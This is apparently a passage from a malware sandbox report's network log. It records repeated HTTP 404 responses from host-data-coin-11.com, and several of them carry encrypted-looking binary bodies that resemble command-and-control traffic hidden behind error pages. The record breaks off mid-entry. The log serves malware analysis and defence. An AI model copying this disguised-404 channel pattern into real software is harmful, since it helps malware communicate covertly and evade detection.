                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 19:27:53 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 